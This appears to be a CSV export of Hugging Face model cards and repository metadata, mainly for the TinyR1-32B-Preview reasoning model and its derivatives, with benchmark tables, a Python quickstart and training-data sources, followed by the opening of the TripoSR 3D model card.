---","{""id"": ""immaari/Model-Test-04"", ""author"": ""immaari"", ""sha"": ""f41bf46d67cca980ea379546e1a0ff7d4776da36"", ""last_modified"": ""2025-03-07 09:56:15+00:00"", ""created_at"": ""2025-03-06 08:09:56+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""dataset:simplescaling/s1K"", ""dataset:facebook/natural_reasoning"", ""base_model:ValueFX9507/Tifa-Deepsex-14b-CoT-GGUF-Q4"", ""base_model:finetune:ValueFX9507/Tifa-Deepsex-14b-CoT-GGUF-Q4"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- ValueFX9507/Tifa-Deepsex-14b-CoT-GGUF-Q4\ndatasets:\n- simplescaling/s1K\n- facebook/natural_reasoning"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-03-07 09:56:15+00:00"", ""cardData"": ""base_model:\n- ValueFX9507/Tifa-Deepsex-14b-CoT-GGUF-Q4\ndatasets:\n- simplescaling/s1K\n- facebook/natural_reasoning"", ""transformersInfo"": null, ""_id"": ""67c9585430792f0621b4a980"", ""modelId"": ""immaari/Model-Test-04"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=immaari/Model-Test-04&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bimmaari%2FModel-Test-04%5D(%2Fimmaari%2FModel-Test-04)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
DarklinkYT/Roleplay,"---
license: cc-by-nc-4.0
language:
- en
base_model:
- ValueFX9507/Tifa-Deepsex-14b-CoT-GGUF-Q4
tags:
- Roleplay
---","{""id"": ""DarklinkYT/Roleplay"", ""author"": ""DarklinkYT"", ""sha"": ""c7774d4cff7953cca55a853ec737909ccba73780"", ""last_modified"": ""2025-03-08 15:06:05+00:00"", ""created_at"": ""2025-03-08 14:55:44+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""Roleplay"", ""en"", ""base_model:ValueFX9507/Tifa-Deepsex-14b-CoT-GGUF-Q4"", ""base_model:finetune:ValueFX9507/Tifa-Deepsex-14b-CoT-GGUF-Q4"", ""license:cc-by-nc-4.0"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- ValueFX9507/Tifa-Deepsex-14b-CoT-GGUF-Q4\nlanguage:\n- en\nlicense: cc-by-nc-4.0\ntags:\n- Roleplay"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-03-08 15:06:05+00:00"", ""cardData"": ""base_model:\n- ValueFX9507/Tifa-Deepsex-14b-CoT-GGUF-Q4\nlanguage:\n- en\nlicense: cc-by-nc-4.0\ntags:\n- Roleplay"", ""transformersInfo"": null, ""_id"": ""67cc5a70eee0ee19a690f91b"", ""modelId"": ""DarklinkYT/Roleplay"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=DarklinkYT/Roleplay&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BDarklinkYT%2FRoleplay%5D(%2FDarklinkYT%2FRoleplay)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
TinyR1-32B-Preview_finetunes_20250426_121513.csv_finetunes_20250426_121513.csv
ADDED
@@ -0,0 +1,252 @@
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
qihoo360/TinyR1-32B-Preview,"---
license: apache-2.0
library_name: transformers
base_model:
- deepseek-ai/DeepSeek-R1-Distill-Qwen-32B
---

**Model Name**: Tiny-R1-32B-Preview


## Update (April 16, 2025)

We have officially open-sourced the <a href=""https://huggingface.co/datasets/qihoo360/TinyR1-32B-Preview-datasets""><b>training dataset</b></a>, as well as the full <a href=""https://github.com/Qihoo360/TinyR1-32B-Preview""><b>training and evaluation pipeline</b></a>.

## Update (March 7, 2025)

We have uploaded the technical report. <a href=""https://arxiv.org/abs/2503.04872""><b>Paper Link</b>👁️</a>


## Introduction
We introduce our first-generation reasoning model, Tiny-R1-32B-Preview, which outperforms the 70B model Deepseek-R1-Distill-Llama-70B and nearly matches the full R1 model in math.

We applied supervised fine-tuning (SFT) to Deepseek-R1-Distill-Qwen-32B across three target domains (Mathematics, Code, and Science) using the [360-LLaMA-Factory](https://github.com/Qihoo360/360-LLaMA-Factory/) training framework to produce three domain-specific models. We used questions from open-source data as seeds and had R1 generate the responses for the mathematics, coding, and science tasks, creating a specialized model for each domain. Building on this, we leveraged the Mergekit tool from the Arcee team to combine the models into Tiny-R1-32B-Preview, which demonstrates strong overall performance.

*Note:* We have fixed a tokenizer config bug that existed before March 3, 2025, at 20:50 Beijing Time (UTC+8). Refer to [Hotfix](https://huggingface.co/qihoo360/TinyR1-32B-Preview#hotfix-march-3-2025).


## Evaluation
| Model | Math (AIME 2024) | Coding (LiveCodeBench) | Science (GPQA-Diamond) |
| ------------------------------- | ------------------- | ----------------------- | ---------------------- |
| Deepseek-R1-Distill-Qwen-32B | 72.6 | 57.2 | 62.1 |
| Deepseek-R1-Distill-Llama-70B | 70.0 | 57.5 | 65.2 |
| Deepseek-R1 | 79.8 | 65.9 | 71.5 |
| Tiny-R1-32B-Preview (Ours) | 78.1 | 61.6 | 65.0 |

All scores are reported as pass@1.
For AIME 2024, we sample 16 responses, and for GPQA-Diamond, we sample 4 responses, both using average overall accuracy for stable evaluation.
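
In other words, for a benchmark sampled k times the reported score is the mean single-sample accuracy:

$$\text{score} = \frac{1}{k}\sum_{i=1}^{k}\mathbb{1}\left[\text{response } i \text{ is correct}\right], \qquad k=16 \text{ for AIME 2024}, \; k=4 \text{ for GPQA-Diamond.}$$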

We merged the three separately trained domain models into a single model. Below are the comparison results.
| Model | Math (AIME 2024) | Coding (LiveCodeBench) | Science (GPQA-Diamond) |
| ------------------------------- | ------------------- | ----------------------- | ---------------------- |
| Math-Model | 73.1 | - | - |
| Code-Model | - | 63.4 | - |
| Science-Model | - | - | 64.5 |
| Merged-Model (Tiny-R1-32B-Preview) | 78.1 | 61.6 | 65.0 |


## Quickstart

```python
from transformers import AutoModelForCausalLM, AutoTokenizer

model_name = ""qihoo360/TinyR1-32B-Preview""

model = AutoModelForCausalLM.from_pretrained(
    model_name,
    torch_dtype=""auto"",
    device_map=""auto""
)
tokenizer = AutoTokenizer.from_pretrained(model_name)

prompt = ""Please reason step by step, and put your final answer within \\boxed{}. Solve the integral: \\[I = \\int \\frac{x^2}{(x+1)^3} \\,dx\\]""
messages = [
    {""role"": ""user"", ""content"": prompt}
]
text = tokenizer.apply_chat_template(
    messages,
    tokenize=False,
    add_generation_prompt=True
)
model_inputs = tokenizer([text], return_tensors=""pt"").to(model.device)

generated_ids = model.generate(
    **model_inputs,
    max_new_tokens=4000
)
generated_ids = [
    output_ids[len(input_ids):] for input_ids, output_ids in zip(model_inputs.input_ids, generated_ids)
]

response = tokenizer.batch_decode(generated_ids, skip_special_tokens=True)[0]

print(response)
```


## Data

#### 1. Math
58.3k CoT trajectories from [open-r1/OpenR1-Math-220k](https://huggingface.co/datasets/open-r1/OpenR1-Math-220k), default subset

#### 2. Coding
19k CoT trajectories from [open-thoughts/OpenThoughts-114k](https://huggingface.co/datasets/open-thoughts/OpenThoughts-114k), coding subset

#### 3. Science
8.6k CoT trajectories:
- 2.7k CoT trajectories from [simplescaling/data_ablation_full59K](https://huggingface.co/datasets/simplescaling/data_ablation_full59K), science and health science subset
- 4.9k CoT trajectories from [open-thoughts/OpenThoughts-114k](https://huggingface.co/datasets/open-thoughts/OpenThoughts-114k), science subset
- 1.0k CoT trajectories from [simplescaling/s1K-1.1](https://huggingface.co/datasets/simplescaling/s1K-1.1), all


## Open Source Plan
We will publish a technical report as soon as possible and open-source our training and evaluation code, selected training data, and evaluation logs. Having benefited immensely from the open-source community, we are committed to giving back in every way we can.

## Caveats
TinyR1-32B-Preview is an experimental research model designed to advance AI reasoning capabilities. As a preview release, it has demonstrated higher evaluation scores on some benchmarks but is not intended for general user applications. Key limitations include:

1. Incorrect parameter configurations may result in repetitive output loops, similar to R1. We recommend setting the temperature to 0.6 and top-p to 0.95, in line with R1's configuration (see the sketch after this list).
2. The model currently omits the `<think>` token, which indicates the reasoning start, and only outputs the `</think>` token to signal the end of the thinking process. This will be addressed soon in the next version.
3. The model may generate overly lengthy reasoning chains for simple queries. We are working on improvements.
4. Benchmark coverage is limited. We encourage users to evaluate the model on additional benchmarks, and we will continue to expand our benchmark results.
5. The model requires enhanced safety measures to ensure reliable and secure performance.
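
A minimal sketch of caveat 1's recommended sampling settings, reusing the `model` and `model_inputs` objects from the Quickstart above:

```python
# Sketch only: applies the recommended sampling settings from caveat 1
# to the Quickstart objects above; not an official snippet from this repo.
generated_ids = model.generate(
    **model_inputs,
    max_new_tokens=4000,
    do_sample=True,
    temperature=0.6,
    top_p=0.95,
)
```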

## Hotfix (March 3, 2025)
On March 3, 2025, at 20:50 Beijing Time (UTC+8), we updated our tokenizer. Users who downloaded our model prior to this update are advised to re-download the tokenizer-related configuration files (tokenizer.json, tokenizer_config.json, config.json, and special_tokens_map.json).
Our internal testing has verified that this update resolves the following issues reported by users:
1. Output repetition.
2. Degradation in benchmark performance.
3. Generation of token IDs exceeding the vocabulary range.
We appreciate your feedback and encourage you to report any further issues. Additionally, we are actively working on the technical report and consolidating relevant code and data.


## Contributors

*360 Team:*
Lin Sun,
Guangxiang Zhao,
Xiaoqi Jian,
Weihong Lin,
Yongfu Zhu,
Change Jia,
Linglin Zhang,
Jinzhu Wu,
Sai-er Hu,
Xiangzheng Zhang

*PKU Team:*
Yuhan Wu,
Zihan Jiang,
Wenrui Liu,
Junting Zhou,
Bin Cui,
Tong Yang


## Citation
```
@misc{tinyr1proj,
      title={SuperDistillation Achieves Near-R1 Performance with Just 5% of Parameters.},
      author={TinyR1 Team},
      year={2025},
      eprint={},
      archivePrefix={},
      primaryClass={},
      url={https://huggingface.co/qihoo360/TinyR1-32B-Preview},
}
```","{""id"": ""qihoo360/TinyR1-32B-Preview"", ""author"": ""qihoo360"", ""sha"": ""b1124b4dd0cdd1f4816e975164b2c0599c9a09a4"", ""last_modified"": ""2025-04-16 14:27:33+00:00"", ""created_at"": ""2025-02-24 15:54:05+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 4024, ""downloads_all_time"": null, ""likes"": 327, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""qwen2"", ""text-generation"", ""conversational"", ""arxiv:2503.04872"", ""base_model:deepseek-ai/DeepSeek-R1-Distill-Qwen-32B"", ""base_model:finetune:deepseek-ai/DeepSeek-R1-Distill-Qwen-32B"", ""license:apache-2.0"", ""autotrain_compatible"", ""text-generation-inference"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- deepseek-ai/DeepSeek-R1-Distill-Qwen-32B\nlibrary_name: transformers\nlicense: apache-2.0"", ""widget_data"": [{""text"": ""Hi, what can you help me with?""}, {""text"": ""What is 84 * 3 / 2?""}, {""text"": ""Tell me an interesting fact about the universe!""}, {""text"": ""Explain quantum computing in simple terms.""}], ""model_index"": null, ""config"": {""architectures"": [""Qwen2ForCausalLM""], ""model_type"": ""qwen2"", ""tokenizer_config"": {""bos_token"": ""<\uff5cbegin\u2581of\u2581sentence\uff5c>"", ""chat_template"": ""{% if not add_generation_prompt is defined %}{% set add_generation_prompt = false %}{% endif %}{% set ns = namespace(is_first=false, is_tool=false, is_output_first=true, system_prompt='') %}{%- for message in messages %}{%- if message['role'] == 'system' %}{% set ns.system_prompt = message['content'] %}{%- endif %}{%- endfor %}{{bos_token}}{{ns.system_prompt}}{%- for message in messages %}{%- if message['role'] == 'user' %}{%- set ns.is_tool = false -%}{{'<\uff5cUser\uff5c>' + message['content']}}{%- endif %}{%- if message['role'] == 'assistant' and message['content'] is none %}{%- set ns.is_tool = false -%}{%- for tool in message['tool_calls']%}{%- if not ns.is_first %}{{'<\uff5cAssistant\uff5c><\uff5ctool\u2581calls\u2581begin\uff5c><\uff5ctool\u2581call\u2581begin\uff5c>' + tool['type'] + '<\uff5ctool\u2581sep\uff5c>' + tool['function']['name'] + '\\n' + '```json' + '\\n' + tool['function']['arguments'] + '\\n' + '```' + '<\uff5ctool\u2581call\u2581end\uff5c>'}}{%- set ns.is_first = true -%}{%- else %}{{'\\n' + '<\uff5ctool\u2581call\u2581begin\uff5c>' + tool['type'] + '<\uff5ctool\u2581sep\uff5c>' + tool['function']['name'] + '\\n' + '```json' + '\\n' + tool['function']['arguments'] + '\\n' + '```' + '<\uff5ctool\u2581call\u2581end\uff5c>'}}{{'<\uff5ctool\u2581calls\u2581end\uff5c><\uff5cend\u2581of\u2581sentence\uff5c>'}}{%- endif %}{%- endfor %}{%- endif %}{%- if message['role'] == 'assistant' and message['content'] is not none %}{%- if ns.is_tool %}{{'<\uff5ctool\u2581outputs\u2581end\uff5c>' + message['content'] + '<\uff5cend\u2581of\u2581sentence\uff5c>'}}{%- set ns.is_tool = false -%}{%- else %}{% set content = message['content'] %}{% if '</think>' in content %}{% set content = content.split('</think>')[-1] %}{% endif %}{{'<\uff5cAssistant\uff5c>' + content + '<\uff5cend\u2581of\u2581sentence\uff5c>'}}{%- endif %}{%- endif %}{%- if message['role'] == 'tool' %}{%- set ns.is_tool = true -%}{%- if ns.is_output_first %}{{'<\uff5ctool\u2581outputs\u2581begin\uff5c><\uff5ctool\u2581output\u2581begin\uff5c>' + message['content'] + 
'<\uff5ctool\u2581output\u2581end\uff5c>'}}{%- set ns.is_output_first = false %}{%- else %}{{'\\n<\uff5ctool\u2581output\u2581begin\uff5c>' + message['content'] + '<\uff5ctool\u2581output\u2581end\uff5c>'}}{%- endif %}{%- endif %}{%- endfor -%}{% if ns.is_tool %}{{'<\uff5ctool\u2581outputs\u2581end\uff5c>'}}{% endif %}{% if add_generation_prompt and not ns.is_tool %}{{'<\uff5cAssistant\uff5c><think>\\n'}}{% endif %}"", ""eos_token"": ""<|endoftext|>"", ""pad_token"": ""<\uff5cend\u2581of\u2581sentence\uff5c>"", ""unk_token"": null, ""use_default_system_prompt"": false}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='TinyR1_32B_Preview.pdf', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00014.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00014.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00003-of-00014.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00004-of-00014.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00005-of-00014.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00006-of-00014.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00007-of-00014.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00008-of-00014.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00009-of-00014.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00010-of-00014.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00011-of-00014.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00012-of-00014.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00013-of-00014.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00014-of-00014.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""BF16"": 32763876352}, ""total"": 32763876352}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-04-16 14:27:33+00:00"", ""cardData"": ""base_model:\n- deepseek-ai/DeepSeek-R1-Distill-Qwen-32B\nlibrary_name: transformers\nlicense: apache-2.0"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""67bc961d66ca0c292d5f321c"", ""modelId"": ""qihoo360/TinyR1-32B-Preview"", ""usedStorage"": 65540024750}",0,"https://huggingface.co/AlexBefest/tinyR1-32B-preview_exl2_6.0bpw, 
https://huggingface.co/Apel-sin/tinyR1-32B-preview-exl2",2,https://huggingface.co/GainEnergy/OGAI-r1,1,"https://huggingface.co/YiHuan/TinyR1-32B-Preview-Q4_K_M-GGUF, https://huggingface.co/DevQuasar/qihoo360.TinyR1-32B-Preview-GGUF, https://huggingface.co/mradermacher/TinyR1-32B-Preview-GGUF, https://huggingface.co/mradermacher/TinyR1-32B-Preview-i1-GGUF, https://huggingface.co/Orion-zhen/TinyR1-32B-Preview-AWQ, https://huggingface.co/llpp9980/TinyR1-32B-Preview-Q4_K_M-GGUF, https://huggingface.co/Chan-Y/TinyR1-32B-Preview-Q4_K_M-GGUF, https://huggingface.co/JohnRoger/TinyR1-32B-Preview-Q4_K_M-GGUF, https://huggingface.co/openity/TinyR1-32B-Preview-Q5_K_M-GGUF, https://huggingface.co/physicsplayer/TinyR1-32B-Preview-Q8_0-GGUF, https://huggingface.co/EntropyYue/TinyR1-32B-Preview-Q2_K-GGUF, https://huggingface.co/tensorblock/TinyR1-32B-Preview-GGUF, https://huggingface.co/cassettesgoboom/TinyR1-32B-Preview-Q3_K_L-GGUF, https://huggingface.co/mlx-community/TinyR1-32B-Preview-8bit, https://huggingface.co/bartowski/qihoo360_TinyR1-32B-Preview-GGUF, https://huggingface.co/mmnga/TinyR1-32B-Preview-gguf, https://huggingface.co/GrimsenClory/TinyR1-32B-Preview-Q6_K-GGUF, https://huggingface.co/bartowski/qihoo360_TinyR1-32B-Preview-v0.1-GGUF, https://huggingface.co/cnfusion/TinyR1-32B-Preview-Q3-mlx, https://huggingface.co/cnfusion/TinyR1-32B-Preview-Q4-mlx, https://huggingface.co/Triangle104/TinyR1-32B-Preview-Q3_K_S-GGUF, https://huggingface.co/Triangle104/TinyR1-32B-Preview-Q3_K_M-GGUF, https://huggingface.co/Triangle104/TinyR1-32B-Preview-Q3_K_L-GGUF, https://huggingface.co/Triangle104/TinyR1-32B-Preview-Q4_K_S-GGUF, https://huggingface.co/cnfusion/TinyR1-32B-Preview-Q6-mlx, https://huggingface.co/bartowski/qihoo360_TinyR1-32B-Preview-v0.2-GGUF, https://huggingface.co/MrDevolver/TinyR1-32B-Preview-Q2_K-GGUF, https://huggingface.co/Aldaris/TinyR1-32B-Preview-Q4_K_M-GGUF, https://huggingface.co/onekq-ai/TinyR1-32B-Preview-bnb-4bit, https://huggingface.co/Xccxin/TinyR1-32B-Preview-Q8-mlx, https://huggingface.co/Triangle104/TinyR1-32B-Preview-Q4_K_M-GGUF, https://huggingface.co/Triangle104/TinyR1-32B-Preview-Q5_K_S-GGUF, https://huggingface.co/Triangle104/TinyR1-32B-Preview-Q5_K_M-GGUF, https://huggingface.co/Triangle104/TinyR1-32B-Preview-Q6_K-GGUF, https://huggingface.co/Triangle104/TinyR1-32B-Preview-Q8_0-GGUF",35,"https://huggingface.co/DavidAU/Qwen2.5-QwQ-35B-Eureka-Cubed, https://huggingface.co/DavidAU/Qwen2.5-QwQ-37B-Eureka-Triple-Cubed, https://huggingface.co/DavidAU/Qwen2.5-The-Wisemen-QwQ-Deep-Tiny-Sherlock-32B, https://huggingface.co/marcuscedricridia/Springer-32B-1, https://huggingface.co/YOYO-AI/DS-R1-Distill-32B-SCE, https://huggingface.co/YOYO-AI/DS-R1-Distill-32B-SCE-V2",6,huggingface/InferenceSupport/discussions/new?title=qihoo360/TinyR1-32B-Preview&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bqihoo360%2FTinyR1-32B-Preview%5D(%2Fqihoo360%2FTinyR1-32B-Preview)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
https://huggingface.co/AlexBefest/tinyR1-32B-preview_exl2_6.0bpw,N/A,N/A,1,,0,,0,,0,,0,,0
Apel-sin/tinyR1-32B-preview-exl2,"---
license: apache-2.0
library_name: transformers
base_model: qihoo360/TinyR1-32B-Preview
---

**Model Name**: Tiny-R1-32B-Preview
**Title**: SuperDistillation Achieves Near-R1 Performance with Just 5% of Parameters.

# Introduction
We introduce our first-generation reasoning model, Tiny-R1-32B-Preview, which outperforms the 70B model Deepseek-R1-Distill-Llama-70B and nearly matches the full R1 model in math.


## Evaluation
| Model | Math (AIME 2024) | Coding (LiveCodeBench) | Science (GPQA-Diamond) |
| ------------------------------- | ------------------- | ----------------------- | ---------------------- |
| Deepseek-R1-Distill-Qwen-32B | 72.6 | 57.2 | 62.1 |
| Deepseek-R1-Distill-Llama-70B | 70.0 | 57.5 | 65.2 |
| Deepseek-R1 | 79.8 | 65.9 | 71.5 |
| Tiny-R1-32B-Preview (Ours) | 78.1 | 61.6 | 65.0 |

All scores are reported as pass@1.
For AIME 2024, we sample 16 responses, and for GPQA-Diamond, we sample 4 responses, both using average overall accuracy for stable evaluation.

## Approach
| Model | Math (AIME 2024) | Coding (LiveCodeBench) | Science (GPQA-Diamond) |
| ------------------------------- | ------------------- | ----------------------- | ---------------------- |
| Math-Model (Ours) | 73.1 | - | - |
| Code-Model (Ours) | - | 63.4 | - |
| Science-Model (Ours) | - | - | 64.5 |
| Tiny-R1-32B-Preview (Ours) | 78.1 | 61.6 | 65.0 |


We applied supervised fine-tuning (SFT) to Deepseek-R1-Distill-Qwen-32B across three target domains (Mathematics, Code, and Science) using the [360-LLaMA-Factory](https://github.com/Qihoo360/360-LLaMA-Factory/) training framework to produce three domain-specific models. We used questions from open-source data as seeds and used DeepSeek-R1 to generate responses for the mathematics, coding, and science tasks separately, creating a specialized model for each domain. Building on this, we leveraged the Mergekit tool from the Arcee team to combine the models into Tiny-R1-32B-Preview, which demonstrates strong overall performance.



## Data

#### 1. Math
58.3k CoT trajectories from [open-r1/OpenR1-Math-220k](https://huggingface.co/datasets/open-r1/OpenR1-Math-220k), default subset

#### 2. Coding
19k CoT trajectories from [open-thoughts/OpenThoughts-114k](https://huggingface.co/datasets/open-thoughts/OpenThoughts-114k), coding subset

#### 3. Science
We used R1 to generate 8 CoT trajectories for each of 7.6k seed examples, giving 60.8k CoT trajectories in total; the seed examples are as follows:
- 2.7k seed examples from [simplescaling/data_ablation_full59K](https://huggingface.co/datasets/simplescaling/data_ablation_full59K), science and health science subset
- 4.9k seed examples from [open-thoughts/OpenThoughts-114k](https://huggingface.co/datasets/open-thoughts/OpenThoughts-114k), science subset



## Open Source Plan
We will publish a technical report as soon as possible and open-source our training and evaluation code, selected training data, and evaluation logs. Having benefited immensely from the open-source community, we are committed to giving back in every way we can.



## Contributors

*360 Team:*
Lin Sun,
Guangxiang Zhao,
Xiaoqi Jian,
Weihong Lin,
Yongfu Zhu,
Change Jia,
Linglin Zhang,
Jinzhu Wu,
Sai-er Hu,
Xiangzheng Zhang

*PKU Team:*
Yuhan Wu,
Zihan Jiang,
Wenrui Liu,
Junting Zhou,
Bin Cui,
Tong Yang


## Citation
```
@misc{tinyr1proj,
      title={SuperDistillation Achieves Near-R1 Performance with Just 5% of Parameters.},
      author={TinyR1 Team},
      year={2025},
      eprint={},
      archivePrefix={},
      primaryClass={},
      url={https://huggingface.co/qihoo360/TinyR1-32B-Preview},
}
```","{""id"": ""Apel-sin/tinyR1-32B-preview-exl2"", ""author"": ""Apel-sin"", ""sha"": ""16e61f3b9ec1b3f41ddf36aed6b23729ae858c20"", ""last_modified"": ""2025-03-01 12:15:35+00:00"", ""created_at"": ""2025-03-01 12:14:00+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 1, ""downloads_all_time"": null, ""likes"": 3, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""base_model:qihoo360/TinyR1-32B-Preview"", ""base_model:finetune:qihoo360/TinyR1-32B-Preview"", ""license:apache-2.0"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: qihoo360/TinyR1-32B-Preview\nlibrary_name: transformers\nlicense: apache-2.0"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='measurement.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-03-01 12:15:35+00:00"", ""cardData"": ""base_model: qihoo360/TinyR1-32B-Preview\nlibrary_name: transformers\nlicense: apache-2.0"", ""transformersInfo"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""_id"": ""67c2fa085c1ed1f81020a6b0"", ""modelId"": ""Apel-sin/tinyR1-32B-preview-exl2"", ""usedStorage"": 33683930512}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=Apel-sin/tinyR1-32B-preview-exl2&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BApel-sin%2FtinyR1-32B-preview-exl2%5D(%2FApel-sin%2FtinyR1-32B-preview-exl2)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1

TripoSR_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv
ADDED
@@ -0,0 +1,57 @@
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
stabilityai/TripoSR,"---
datasets:
- allenai/objaverse
tags:
- 3d
extra_gated_fields:
  Name: text
  Email: text
  Country: text
  Organization or Affiliation: text
  I ALLOW Stability AI to email me about new model releases: checkbox
license: mit
pipeline_tag: image-to-3d
---

> Try our new model: **SF3D**, with several improvements such as faster generation and more game-ready assets.
>
> The model is available [here](https://huggingface.co/stabilityai/stable-fast-3d) and we also have a [demo](https://huggingface.co/spaces/stabilityai/stable-fast-3d).

# TripoSR

TripoSR is a fast, feed-forward 3D generative model developed in collaboration between Stability AI and Tripo AI.

## Model Details

### Model Description

We closely follow the [LRM](https://arxiv.org/abs/2311.04400) network architecture for the model design; TripoSR incorporates a series of technical advancements over the LRM model in terms of both data curation and model and training improvements. For more technical details and evaluations, please refer to [our tech report](https://arxiv.org/abs/2403.02151).

* **Developed by**: [Stability AI](https://stability.ai/), [Tripo AI](https://tripo3d.ai/)
* **Model type**: Feed-forward 3D reconstruction from a single image
* **License**: MIT
* **Hardware**: We trained `TripoSR` for 5 days on 22 GPU nodes, each with 8 A100 40GB GPUs

### Model Sources

* **Repository**: https://github.com/VAST-AI-Research/TripoSR
* **Tech report**: https://arxiv.org/abs/2403.02151
* **Demo**: https://huggingface.co/spaces/stabilityai/TripoSR

### Training Dataset

We use renders from the [Objaverse](https://objaverse.allenai.org/objaverse-1.0) dataset, using an enhanced rendering method that more closely replicates the distribution of images found in the real world, which significantly improves our model’s ability to generalize. We selected a carefully curated subset of the Objaverse dataset for the training data, which is available under the CC-BY license.

## Usage

* For usage instructions, please refer to our [TripoSR GitHub repository](https://github.com/VAST-AI-Research/TripoSR)

